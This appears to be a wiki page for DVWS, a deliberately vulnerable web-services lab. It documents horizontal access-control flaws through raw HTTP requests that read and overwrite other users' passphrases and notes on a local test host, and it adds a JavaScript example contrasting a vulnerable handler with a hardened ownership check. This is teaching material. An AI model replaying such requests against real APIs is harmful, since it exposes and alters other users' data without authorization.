Horizontal Access Control
Sam Sanoop edited this page Aug 4, 2022
Horizontal escalation of privilege is possible (one user can view/modify information of another user).
- It is possible to view passphrases created by a user if you know the username:

```http
GET /api/v2/passphrase/test HTTP/1.1
Host: dvws.local
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:84.0) Gecko/20100101 Firefox/84.0
Accept: application/json, text/plain, */*
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VyIjoidGVzdCIsInBlcm1pc3Npb25zIjpbInVzZXI6cmVhZCIsInVzZXI6d3JpdGUiXSwiaWF0IjoxNjA5MTAwMzk3LCJleHAiOjE2MDkyNzMxOTcsImlzcyI6Imh0dHBzOi8vZ2l0aHViLmNvbS9zbm9vcHlzZWN1cml0eSJ9.MMv-cE5sDjECTwfKaxZ9usxk5qx6ekeyk01ulrE97ZI
Connection: close
Referer: http://dvws.local/passphrasegen.html
```
- If you know the note ID (e.g. 1-8) it is possible to read any note:

```http
GET /api/v2/notes/6 HTTP/1.1
Host: dvws.local
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: application/json, text/plain, */*
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VyIjoiZm9vYmFyMiIsInBlcm1pc3Npb25zIjpbInVzZXI6cmVhZCIsInVzZXI6d3JpdGUiLCJ1c2VyOmFkbWluIl0sImlhdCI6MTY1OTY0ODg5OCwiZXhwIjoxNjU5ODIxNjk4LCJpc3MiOiJodHRwczovL2dpdGh1Yi5jb20vc25vb3B5c2VjdXJpdHkifQ.0qStFIfQ3WEtX_SYujlXsJQZWMqN6c1HE8FrKn_HFuQ
Connection: close
Referer: http://dvws.local/notes.html
```
- If you know the note name, you can change the content of the note or delete it. As a result, any user can change the note content of any other user. E.g.:

```http
PUT /api/v2/notes/testnote HTTP/1.1
Host: dvws.local
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:84.0) Gecko/20100101 Firefox/84.0
Accept: application/json, text/plain, */*
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VyIjoic2FtcyIsInBlcm1pc3Npb25zIjpbInVzZXI6cmVhZCIsInVzZXI6d3JpdGUiXSwiaWF0IjoxNjA5MTAyNTYxLCJleHAiOjE2MDkyNzUzNjEsImlzcyI6Imh0dHBzOi8vZ2l0aHViLmNvbS9zbm9vcHlzZWN1cml0eSJ9.BCEvHUgsE6H0GkgOltN2146Yp8kdts6wzYaKomYdOuI
Content-Type: application/json;charset=utf-8
Content-Length: 55
Origin: http://dvws.local
Connection: close
Referer: http://dvws.local/notes.html

{"name":"sam","body":"this can be changed by any user"}
```
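The root cause in all three requests is the same: the API authenticates the bearer token but never compares the record's owner with the authenticated user. The following is an added illustration, not DVWS's own code, showing the vulnerable handler pattern beside a hardened one for the notes endpoint. It assumes the JWT signature has already been verified upstream, that only the verified claims object reaches the handler, and it uses a constructed in-memory store keyed by numeric note ID.

```javascript
// Added example (not DVWS code): ownership check for /api/v2/notes/:id.
// Assumes the JWT was ALREADY verified upstream (e.g. jwt.verify) and only
// the verified claims object is passed in; claims.user is the subject.

// Constructed in-memory store standing in for the DVWS notes collection.
function makeStore() {
  return {
    6: { id: 6, owner: "test", name: "testnote", body: "test's private note" },
    7: { id: 7, owner: "sams", name: "samsnote", body: "sams' private note" },
  };
}

// Vulnerable pattern: authentication is checked, but the note's owner is
// never compared with the caller, so any valid token reaches any note.
function noteHandlerVulnerable(store, claims, noteId, update) {
  if (!claims || typeof claims.user !== "string") return { status: 401 };
  const note = store[noteId];
  if (!note) return { status: 404 };
  if (update) note.body = String(update.body);
  return { status: 200, note };
}

// Hardened pattern: the record's owner must equal the authenticated user.
// Ownership is taken from the verified token, never from the request body,
// so a body carrying {"name": "sam", ...} cannot re-assign the note.
function noteHandlerHardened(store, claims, noteId, update) {
  if (!claims || typeof claims.user !== "string") return { status: 401 };
  const note = store[noteId];
  // Answering 404 for both "missing" and "not yours" avoids confirming
  // that another user's note ID exists.
  if (!note || note.owner !== claims.user) return { status: 404 };
  if (update) {
    if (typeof update.body !== "string") return { status: 400 };
    note.body = update.body; // only the body is writable; id/owner are fixed
  }
  return { status: 200, note };
}

// Demo: user "sams" (the subject of the PUT request above) tries to
// overwrite note 6, which belongs to "test".
function demo() {
  const sams = { user: "sams", permissions: ["user:read", "user:write"] };
  const edit = { body: "this can be changed by any user" };
  const before = noteHandlerVulnerable(makeStore(), sams, 6, edit).status;
  const after = noteHandlerHardened(makeStore(), sams, 6, edit).status;
  return { before, after }; // { before: 200, after: 404 }
}
```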